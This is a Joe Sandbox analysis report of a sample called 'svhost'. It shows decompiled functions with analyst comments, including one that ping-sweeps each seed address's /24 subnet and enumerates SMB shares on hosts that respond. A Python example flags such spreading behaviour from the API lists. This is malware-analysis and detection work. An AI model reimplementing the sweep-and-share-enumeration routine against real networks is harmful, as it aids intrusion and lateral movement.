                                      					_t183 = _v72;
                                      					_t167 = _t183 + 0x350;
                                      					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
                                      					__eflags =  *_t167;
                                      				}
                                      				__eflags = _v8 ^ _t292;
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				_pop(_t272);
                                      				_pop(_t282);
                                      				_pop(_t244);
                                      				return E00E89A35(_t244, _v8 ^ _t292, _t264, _t272, _t282);
                                      			}

                                       Instruction address column for this function, 0x00eba146 to 0x00eba4ec; the per-line pairing with the C-code above is not preserved here.


                                      APIs
                                      • GetConsoleCP.KERNEL32(00000000,00E62ABC,00000000), ref: 00EBA18B
                                      • __fassign.LIBCMT ref: 00EBA36A
                                      • __fassign.LIBCMT ref: 00EBA387
                                      • WriteFile.KERNEL32(?,00E6118D,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EBA3CF
                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EBA40F
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EBA4BB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                       • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                      • String ID:
                                      • API String ID: 4031098158-0
                                      • Opcode ID: 7db2b0c3326db0e6da5436ed6ea1370071ae0519e1664de2074a0bad626a15ed
                                      • Instruction ID: 6e8b59014e07db84b9d189aec8510cbb1b1fd9b7f4a12906be74f0b0b00da833
                                      • Opcode Fuzzy Hash: 7db2b0c3326db0e6da5436ed6ea1370071ae0519e1664de2074a0bad626a15ed
                                      • Instruction Fuzzy Hash: 3BD1CD71D002889FCF15CFE8C9849EEBBB5FF48314F28516AE855FB242D631AA06CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00E6D590(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v32;
                                      				char _v44;
                                      				char _v56;
                                      				char _v80;
                                      				char _v104;
                                      				char _v128;
                                      				char _v152;
                                      				signed int _v156;
                                      				signed int _v160;
                                      				intOrPtr _v164;
                                      				intOrPtr _v168;
                                      				char* _v172;
                                      				intOrPtr _v176;
                                      				char* _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				char _v212;
                                      				signed int _t72;
                                      				signed int _t73;
                                      				signed char _t100;
                                      				void* _t103;
                                      				void* _t107;
                                      				signed int _t170;
                                      				void* _t171;
                                      				void* _t172;
                                      				void* _t176;
                                      
                                       				_t176 = __eflags;
                                       				_t169 = __esi;
                                       				_t168 = __edi;
                                       				_t158 = __edx;
                                       				_t118 = __ebx;
                                       				// Prologue: SEH registration and /GS stack cookie (*0xeef074 holds the
                                       				// cookie; E00E89A35 is the cookie check called on return).
                                       				_push(0xffffffff);
                                       				_push(0xec1800);
                                       				_push( *[fs:0x0]);
                                       				_t172 = _t171 - 0xc4;
                                       				_t72 =  *0xeef074; // 0x221cac15
                                       				_t73 = _t72 ^ _t170;
                                       				_v20 = _t73;
                                       				_push(_t73);
                                       				 *[fs:0x0] =  &_v16;
                                       				_v168 = __ecx;
                                       				// _v32 collects the shares found; _v56 is the seed address list filled by
                                       				// E00E6D910 (its source is not visible in this function). Both are walked
                                       				// with a 0x18-byte stride through the begin()/end() helpers E00E51BE0 /
                                       				// E00E51BF0, which is consistent with std::vector<std::string> (inferred
                                       				// from the stride and the LIBCPMTD references, not named in the dump).
                                       				E00E515C0( &_v32, 0xc);
                                       				E00E566A0( &_v32);
                                       				E00E515C0( &_v56, 0xc);
                                       				E00E6D910(__ebx, _v168, __edx, __edi, __esi, _t176,  &_v56);
                                       				_v172 =  &_v56;
                                       				_v156 = E00E51BE0(_v172);
                                       				_v184 = E00E51BF0(_v172);
                                       				// Outer loop: one pass per seed address.
                                       				while(1) {
                                       					_t177 = _v156 - _v184;
                                       					if(_v156 == _v184) {
                                       						break;
                                       					}
                                       					E00E57DE0(_t118,  &_v104, _t168, _t169, _t177, _v156);
                                       					// rfind(".", npos): position of the last dot in the seed address.
                                       					_v176 = E00E57920(_t118,  &_v104, _t168, _t169, ".", 0xffffffff);
                                       					_t178 = _v176 - 0xffffffff;
                                       					if(_v176 != 0xffffffff) {
                                       						_t139 =  &_v104;
                                       						// substr(0, pos + 1): keep the prefix up to and including that dot,
                                       						// e.g. "192.168.1." from "192.168.1.37".
                                       						E00E578D0( &_v104, _t168, _t169, _t178,  &_v152, 0, _v176 + 1);
                                       						_v160 = 1;
                                       						// Inner loop: last octet 1..254 (0xfe), i.e. the whole /24.
                                       						while(1) {
                                       							_t179 = _v160 - 0xfe;
                                       							if(_v160 > 0xfe) {
                                       								break;
                                       							}
                                       							// lfence: compiler-inserted speculation barrier, not sample logic.
                                       							asm("lfence");
                                       							// candidate (_v80) = prefix + to_string(octet)
                                       							E00E6E040(_t118,  &_v152, _t168, _t169, _t179,  &_v80,  &_v152, E00E6D560(_t139, _t179,  &_v212, _v160));
                                       							E00E57B40( &_v212);
                                       							// operator!=: the seed's own address is never probed.
                                       							_t100 = E00E683A0( &_v104,  &_v104,  &_v80);
                                       							_t172 = _t172 + 0x1c;
                                       							if((_t100 & 0x000000ff) != 0) {
                                       								_t103 = E00E51650( &_v80);
                                       								_t172 = _t172 + 4;
                                       								// E00E6DB40: ICMP echo probe (inet_addr, IcmpCreateFile, IcmpSendEcho,
                                       								// IcmpCloseHandle per the APIs below); non-zero when the host answered.
                                       								if((E00E6DB40(_t118, _v168, _t168, _t169, _t103, _a8) & 0x000000ff) != 0) {
                                       									E00E515C0( &_v44, 0xc);
                                       									_t107 = E00E51650( &_v80);
                                       									_t172 = _t172 + 4;
                                       									// E00E6DD10: NetShareEnum (level 1) against the responding host,
                                       									// results into _v44.
                                       									E00E6DD10(_t118, _v168, _t168, _t169,  &_v44, _t107);
                                       									_v180 =  &_v44;
                                       									_v164 = E00E51BE0(_v180);
                                       									_v188 = E00E51BF0(_v180);
                                       									// Append every enumerated share to the result list _v32.
                                       									while(1) {
                                       										_t182 = _v164 - _v188;
                                       										if(_v164 == _v188) {
                                       											break;
                                       										}
                                       										E00E57DE0(_t118,  &_v128, _t168, _t169, _t182, _v164);
                                       										E00E6D830(_t118,  &_v32, _t168, _t169,  &_v128);
                                       										E00E57B40( &_v128);
                                       										_v164 = _v164 + 0x18;
                                       									}
                                       									E00E578B0( &_v44);
                                       								}
                                       							}
                                       							E00E57B40( &_v80);
                                       							_t139 = _v160 + 1;
                                       							__eflags = _t139;
                                       							_v160 = _t139;
                                       						}
                                       						E00E57B40( &_v152);
                                       					}
                                       					E00E57B40( &_v104);
                                       					_t158 = _v156 + 0x18;
                                       					__eflags = _t158;
                                       					_v156 = _t158;
                                       				}
                                       				// Hand the collected share list back through the caller's output (_a4),
                                       				// then destroy the locals and run the cookie check.
                                       				E00E57460(_a4, E00E51650( &_v32));
                                       				E00E578B0( &_v56);
                                       				E00E578B0( &_v32);
                                       				 *[fs:0x0] = _v16;
                                       				__eflags = _v20 ^ _t170;
                                       				return E00E89A35(_t118, _v20 ^ _t170, _t158, _t168, _t169);
                                      			}

                                       Instruction address column for this function, 0x00e6d590 to 0x00e6d82d; the per-line pairing with the C-code above is not preserved here.


                                      APIs
                                        • Part of subcall function 00E57920: _WChar_traits.LIBCPMTD ref: 00E5795C
                                      • task.LIBCPMTD ref: 00E6D6E4
                                      • operator!=.LIBCPMTD ref: 00E6D6F1
                                      • task.LIBCPMTD ref: 00E6D7CB
                                        • Part of subcall function 00E6DB40: std::ios_base::good.LIBCPMTD ref: 00E6DB5B
                                        • Part of subcall function 00E6DB40: std::ios_base::good.LIBCPMTD ref: 00E6DB87
                                        • Part of subcall function 00E6DB40: inet_addr.WS2_32(00000000), ref: 00E6DBA0
                                        • Part of subcall function 00E6DB40: IcmpCreateFile.IPHLPAPI ref: 00E6DBB3
                                        • Part of subcall function 00E6DB40: IcmpSendEcho.IPHLPAPI(000000FF,000000FF,?,00000001,00000000,00000000,0000001D,?), ref: 00E6DC07
                                        • Part of subcall function 00E6DB40: IcmpCloseHandle.IPHLPAPI(000000FF), ref: 00E6DC14
                                        • Part of subcall function 00E6DB40: task.LIBCPMTD ref: 00E6DC45
                                        • Part of subcall function 00E6DD10: std::ios_base::good.LIBCPMTD ref: 00E6DD53
                                        • Part of subcall function 00E6DD10: NetShareEnum.NETAPI32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,0000000C,221CAC15), ref: 00E6DDA3
                                        • Part of subcall function 00E6DD10: task.LIBCPMTD ref: 00E6DE68
                                        • Part of subcall function 00E6DD10: task.LIBCPMTD ref: 00E6DE73
                                      • task.LIBCPMTD ref: 00E6D7B9
                                      • task.LIBCPMTD ref: 00E6D7DB
                                      • task.LIBCPMTD ref: 00E6D7E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                       • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$Icmpstd::ios_base::good$Char_traitsCloseCreateEchoEnumFileHandleSendShareinet_addroperator!=
                                      • String ID:
                                      • API String ID: 2373676131-0
                                      • Opcode ID: ee61f0de9cc03cd107a4fd8c6a9be78a402bd9788b0ecf6215e382dd858e25c2
                                      • Instruction ID: 4f27b741e20513b5255ecada4a8e80ad5e232672787dfbd6d9566e284135007a
                                      • Opcode Fuzzy Hash: ee61f0de9cc03cd107a4fd8c6a9be78a402bd9788b0ecf6215e382dd858e25c2
                                      • Instruction Fuzzy Hash: 8E615E71E042189FDB14EB60EC92FEEB3B9AF54340F9055A9E41A77192EB306A48CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%
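The APIs listed above for this function (NetShareEnum reached through subcall 00E6DD10, with the Icmp*/inet_addr calls recorded in the API ID line) are the share-enumeration and host-sweep building blocks of a network spreader. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses report lines of the "• Name.MODULE(args), ref: ADDR" form shown on this page into per-function API lists and flags functions whose own and subcall-reached APIs cover both share discovery and an ICMP sweep. The embedded report excerpt is constructed for the example: the NetShareEnum, task, GetLastError, ___vcrt_FlsGetValue and SetLastError lines are copied from this page, while the E00E6D700 function header, the Icmp*/inet_addr lines and their ref addresses are made up, and the capability groupings are my own, not the report's.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Set


class ApiCall(NamedTuple):
    """One entry of a Joe Sandbox 'APIs' list under a decompiled function."""
    name: str
    module: str
    ref: str                 # call-site address printed after 'ref:'
    subcall: Optional[str]   # address after 'Part of subcall function', if any


# Function header as printed above each C-Code listing, e.g. "E00E52EE0(void* __ebx, ...) {"
FUNC_HDR = re.compile(r"^E(?P<addr>[0-9A-Fa-f]{8})\(.*\)\s*\{$")

# "Name.MODULE(args), ref: ADDR"; module names are upper-case in the report (NETAPI32, LIBCPMTD, ...)
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_apis(report_text: str) -> Dict[str, List[ApiCall]]:
    """Map each decompiled function (by address) to the API calls listed under it."""
    calls: Dict[str, List[ApiCall]] = defaultdict(list)
    current: Optional[str] = None
    for raw in report_text.splitlines():
        line = raw.strip().lstrip("•").strip()
        hdr = FUNC_HDR.match(line)
        if hdr:
            current = hdr.group("addr").upper()
            calls.setdefault(current, [])
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            sub = m.group("sub")
            calls[current].append(ApiCall(m.group("name"), m.group("mod"),
                                          m.group("ref").upper(), sub.upper() if sub else None))
    return dict(calls)


# Capability groupings are this example's own choice, not taken from the report.
CAPABILITIES: Dict[str, Set[str]] = {
    "share_discovery": {"NetShareEnum", "WNetOpenEnumW", "WNetEnumResourceW"},
    "icmp_host_sweep": {"IcmpCreateFile", "IcmpSendEcho", "IcmpSendEcho2"},
    "ip_string_parse": {"inet_addr", "inet_pton", "InetPtonW"},
}
# A rule fires when every capability it names is present in a function's own or subcall-reached APIs.
RULES: Dict[str, Set[str]] = {
    "network_spreading": {"share_discovery", "icmp_host_sweep"},
}


def capabilities_of(calls: List[ApiCall]) -> Set[str]:
    names = {c.name for c in calls}
    return {cap for cap, apis in CAPABILITIES.items() if names & apis}


def match_rules(report: Dict[str, List[ApiCall]]) -> Dict[str, Set[str]]:
    """Return {function_addr: set of rule names that fired} for every parsed function."""
    return {fn: {rule for rule, needed in RULES.items() if needed <= capabilities_of(calls)}
            for fn, calls in report.items()}


def spreading_candidates(report: Dict[str, List[ApiCall]]) -> List[str]:
    return sorted(fn for fn, hits in match_rules(report).items() if "network_spreading" in hits)


# Constructed excerpt: E00E6D700 and the Icmp*/inet_addr lines are made up for the example.
SAMPLE_REPORT = """\
C-Code - Quality: 90%
E00E6D700(void* __ebx, void* __edi, void* __esi) {
}
APIs
• Part of subcall function 00E6DD10: std::ios_base::good.LIBCPMTD ref: 00E6DD53
• Part of subcall function 00E6DD10: NetShareEnum.NETAPI32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,0000000C,221CAC15), ref: 00E6DDA3
• Part of subcall function 00E6DD10: IcmpCreateFile.IPHLPAPI ref: 00E6DDC0
• Part of subcall function 00E6DD10: IcmpSendEcho.IPHLPAPI(?,?,?,00000020,00000000,?,00000028,000003E8), ref: 00E6DE10
• Part of subcall function 00E6DD10: inet_addr.WS2_32(?), ref: 00E6DE30
• task.LIBCPMTD ref: 00E6D7B9
C-Code - Quality: 85%
E00EA3090(void* __ecx) {
}
APIs
• GetLastError.KERNEL32(?,?,00EA3087,00EA0A85,00E7144E,00000008,00E7176B,00000008,?,?,?,00E51583,?,00000008,221CAC15), ref: 00EA309E
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EA30AC
• SetLastError.KERNEL32(00000000,?,00EA3087,00EA0A85,00E7144E,00000008,00E7176B,00000008,?,?,?,00E51583,?,00000008,221CAC15), ref: 00EA3117
"""

if __name__ == "__main__":
    parsed = parse_apis(SAMPLE_REPORT)
    for fn, hits in match_rules(parsed).items():
        print(fn, sorted(hits) or "-", [c.name for c in parsed[fn]])
```

Because subcall entries are attributed to the function under which the report lists them, a parent that merely calls the scanner is flagged alongside it; that is intended, since the ref addresses kept in each ApiCall still point at where the call actually sits.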

                                      C-Code - Quality: 90%
                                      			E00E52EE0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char _a4) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				char _v32;
                                      				signed int _v33;
                                      				intOrPtr _v40;
                                      				signed int _v44;
                                      				signed int _v48;
                                      				intOrPtr _v52;
                                      				char _v56;
                                      				signed int _t42;
                                      				signed int _t43;
                                      				long _t53;
                                      				intOrPtr* _t58;
                                      				void* _t65;
                                      				void* _t95;
                                      				void* _t96;
                                      				signed int _t97;
                                      
                                      				_t96 = __esi;
                                      				_t95 = __edi;
                                      				_t65 = __ebx;
				_push(0xffffffff); // C++ EH frame registration: initial state -1, handler thunk, previous fs:[0]
				_push(0xebff20);
				_push( *[fs:0x0]);
				_t42 =  *0xeef074; // 0x221cac15 = __security_cookie (MSVC /GS)
				_t43 = _t42 ^ _t97; // cookie XOR ESP, kept at _v20 and re-checked on return
				_v20 = _t43;
				_push(_t43);
				 *[fs:0x0] =  &_v16; // install this frame as the SEH chain head
                                      				_v40 = __ecx;
                                      				_v33 = 0;
				E00E57780( &_v24, _v40 + 0xc); // _CriticalNonReentrantLock::_Scoped_lock on this+0xc (APIs ref 00E52F19)
				_v8 = 0; // EH state 0: the scoped lock is live
                                      				if((E00E52C40(_v40 + 0x3c) & 0x000000ff) != 0) {
                                      					_v33 = 1;
                                      				} else {
                                      					_t92 = _a4;
                                      					E00E52D20(_v40 + 0x3c, _a4);
                                      					E00E57720(_a4 + 8, 2);
                                      					E00E52920(_a4);
                                      				}
				_v8 = 0xffffffff; // EH state -1: the lock scope ends
				E00E57740(); // teardown paired with the scoped lock taken above
                                      				_t103 = _v33 & 0x000000ff;
                                      				if((_v33 & 0x000000ff) == 0) {
                                      					L12:
                                      					 *[fs:0x0] = _v16;
					return E00E89A35(_t65, _v20 ^ _t97, _t92, _t95, _t96); // __security_check_cookie on the way out
                                      				} else {
                                      					_v48 = E00E5A3B0(_t95, _t96, _t103, _a4 + 8, 1, 0);
                                      					_t92 = _v48;
                                      					_v44 = _v48;
					if(_v44 > 3) { // 0..3 are state codes dispatched by the switch below; larger values are compared with the current thread id
                                      						_t53 = GetCurrentThreadId();
                                      						__eflags = _v48 - _t53;
                                      						if(_v48 != _t53) {
                                      							_v52 = E00E5A3F0(_a4 + 8, 2);
                                      							__eflags = _v52 - 3;
                                      							if(_v52 != 3) {
                                      								E00E515C0( &_v32, 8);
                                      								E00E57830( &_v32, _a4 + 0x34);
                                      								_v8 = 1;
                                      								_t58 = E00E53070( &_v56,  &_a4);
                                      								_t92 =  &_v32;
                                      								__eflags = _a4 + 0xc;
                                      								E00E5A410(_a4 + 0xc,  &_v32,  *_t58);
                                      								_v8 = 0xffffffff;
                                      								E00E577E0();
                                      							}
                                      						}
                                      						goto L12;
                                      					}
                                      					switch( *((intOrPtr*)(_v44 * 4 +  &M00E5303C))) {
                                      						case 0:
                                      							goto L6;
                                      						case 1:
                                      							goto L7;
                                      					}
                                      				}
			}

Instruction addresses for E00E52EE0, one per line of the function body above, in order (0x00000000 marks a line with no generated code): 0x00e52ee0, 0x00e52ee0, 0x00e52ee0, 0x00e52ee3, 0x00e52ee5, 0x00e52ef0, 0x00e52ef4, 0x00e52ef9, 0x00e52efb, 0x00e52efe, 0x00e52f02, 0x00e52f08, 0x00e52f0b, 0x00e52f19, 0x00e52f1e, 0x00e52f35, 0x00e52f5d, 0x00e52f37, 0x00e52f37, 0x00e52f41, 0x00e52f4e, 0x00e52f56, 0x00e52f56, 0x00e52f61, 0x00e52f6b, 0x00e52f74, 0x00e52f76, 0x00e5301f, 0x00e53022, 0x00e53037, 0x00e52f7c, 0x00e52f8f, 0x00e52f92, 0x00e52f95, 0x00e52f9c, 0x00e52fac, 0x00e52fb1, 0x00e52fb4, 0x00e52fc9, 0x00e52fcc, 0x00e52fd0, 0x00e52fd7, 0x00e52fe6, 0x00e52feb, 0x00e52ff9, 0x00e53001, 0x00e53008, 0x00e5300b, 0x00e53010, 0x00e5301a, 0x00e5301a, 0x00e52fd0, 0x00000000, 0x00e52fb4, 0x00e52fa1, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00e52fa1

                                      APIs
                                      • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00E52F19
                                      • List.LIBCMTD ref: 00E52F2B
                                      • SafeRWList.LIBCONCRTD ref: 00E52F6B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: List$Concurrency::details::_CriticalLock::_ReentrantSafeScoped_lockScoped_lock::_
                                      • String ID:
                                      • API String ID: 2309065532-0
                                      • Opcode ID: 1d6ca6fdef64c9af75f647ba44e85e10344f82b9ee46c081e49c771d3466ca16
                                      • Instruction ID: a5d13a76bebb5f0da9dba6ae2b574f748ccd5e338924d4975a7c004c53bbac5f
                                      • Opcode Fuzzy Hash: 1d6ca6fdef64c9af75f647ba44e85e10344f82b9ee46c081e49c771d3466ca16
                                      • Instruction Fuzzy Hash: 80418270900208DBCB08DFA8DC51BEEB7B1EF45346F14962DE9167B2C2DB315A08CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 66%
                                      			E00E5A2C0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				char _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				void* __ebp;
                                      				signed int _t23;
                                      				signed int _t24;
                                      				void* _t33;
                                      				signed char _t34;
                                      				void* _t42;
                                      				char* _t48;
                                      				void* _t56;
                                      				void* _t57;
                                      				signed int _t58;
                                      				void* _t59;
                                      				void* _t63;
                                      				intOrPtr _t64;
                                      
                                      				_t57 = __esi;
                                      				_t56 = __edi;
                                      				_t42 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0768);
                                      				_push( *[fs:0x0]);
                                      				_t23 =  *0xeef074; // 0x221cac15
                                      				_t24 = _t23 ^ _t58;
                                      				_v20 = _t24;
                                      				_push(_t24);
                                      				 *[fs:0x0] =  &_v16;
                                      				E00E515C0( &_v28, 8);
                                      				E00E51390();
                                      				_v8 = 0;
                                      				E00E5C300( &_v36, E00E51650(_a8),  &_v28);
                                      				_v40 = E00E5C370;
                                      				_t55 =  &_v36;
                                      				_t33 = E00E7258B(_a4, _v40, E00E51650( &_v36));
                                      				_t63 = _t59 - 0x1c + 0x14;
                                      				if(_t33 == 0) {
					_t48 =  &_v28;
					_t34 = E00E514D0(); // tests whether the exception_ptr at _v28 holds an exception
					_t55 = _t34 & 0x000000ff;
					__eflags = _t34 & 0x000000ff;
					if(__eflags != 0) { // non-empty: copy it and rethrow on this thread
						_t64 = _t63 - 8;
						_t48 = _t64;
						_v44 = _t64;
						E00E51430( &_v28); // exception_ptr copy-constructor (APIs ref 00E5A36E)
						E00E51600(); // std::rethrow_exception (APIs ref 00E5A373)
                                      					}
                                      					E00E725A3(_t42, _t48, _t56, _t57, __eflags);
                                      					_v8 = 0xffffffff;
                                      					E00E513E0();
                                      				} else {
                                      					_v8 = 0xffffffff;
                                      					E00E513E0();
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t42, _v20 ^ _t58, _t55, _t56, _t57);
			}

Instruction addresses for E00E5A2C0, one per line of the function body above, in order: 0x00e5a2c0, 0x00e5a2c0, 0x00e5a2c0, 0x00e5a2c3, 0x00e5a2c5, 0x00e5a2d0, 0x00e5a2d4, 0x00e5a2d9, 0x00e5a2db, 0x00e5a2de, 0x00e5a2e2, 0x00e5a2ed, 0x00e5a2f5, 0x00e5a2fa, 0x00e5a315, 0x00e5a31a, 0x00e5a321, 0x00e5a336, 0x00e5a33b, 0x00e5a340, 0x00e5a353, 0x00e5a356, 0x00e5a35b, 0x00e5a35e, 0x00e5a360, 0x00e5a362, 0x00e5a365, 0x00e5a367, 0x00e5a36e, 0x00e5a373, 0x00e5a373, 0x00e5a378, 0x00e5a37d, 0x00e5a387, 0x00e5a342, 0x00e5a342, 0x00e5a34c, 0x00e5a34c, 0x00e5a38f, 0x00e5a3a4

                                      APIs
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E5A2F5
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E5A34C
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E5A356
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E5A36E
                                      • std::rethrow_exception.LIBCMTD ref: 00E5A373
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E5A387
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::exception_ptr::~exception_ptr$std::exception_ptr::exception_ptr$std::rethrow_exception
                                      • String ID:
                                      • API String ID: 1864382771-0
                                      • Opcode ID: 5b557b5bb7bee4b5b050719947a6bd1575ddc4961eaf8d357839309cbcc5bd31
                                      • Instruction ID: a933b91a51b95f1416892fc46a06f4e15d207e16cc8f093c37e5062403bf32fc
                                      • Opcode Fuzzy Hash: 5b557b5bb7bee4b5b050719947a6bd1575ddc4961eaf8d357839309cbcc5bd31
                                      • Instruction Fuzzy Hash: 9021A471D002099BCB04EFA4D852BFEB7F8AB04355F445AA9F916771C1EF30AA08CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00EA3090(void* __ecx) {
                                      				void* _t4;
                                      				void* _t8;
                                      				void* _t11;
                                      				void* _t13;
                                      				void* _t14;
                                      				void* _t18;
                                      				void* _t23;
                                      				long _t24;
                                      				void* _t27;
                                      
                                      				_t13 = __ecx;
				if( *0xeef170 != 0xffffffff) { // FLS index at 0xeef170; 0xffffffff = never allocated. The shape matches the CRT's __vcrt_getptd_noexit
					_t24 = GetLastError(); // preserve the caller's last-error value across the FLS calls
					_t11 = E00EA426D(_t13, __eflags,  *0xeef170); // ___vcrt_FlsGetValue(index): existing per-thread block, if any
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) { // slot holds -1: per-thread data unavailable on this thread
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) { // no block yet: allocate one
							_t4 = E00EA42A8(_t14, __eflags,  *0xeef170, 0xffffffff); // ___vcrt_FlsSetValue(index, -1): probe that the slot is writable
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E00EA5995(); // allocate the 0x28-byte per-thread data block
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00EA42A8(_t18, __eflags,  *0xeef170, 0); // failure: clear the -1 probe again
								} else {
									_t8 = E00EA42A8(_t18, __eflags,  *0xeef170, _t27); // publish the new block in the FLS slot
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27; // success: return the block
										_t27 = 0; // and clear _t27 so the free below is a no-op
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00EA478C(_t27); // free(_t27): only releases memory on the failure paths
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24); // restore the caller's last-error value
					return _t11;
                                      				} else {
                                      					return 0;
                                      				}
			}

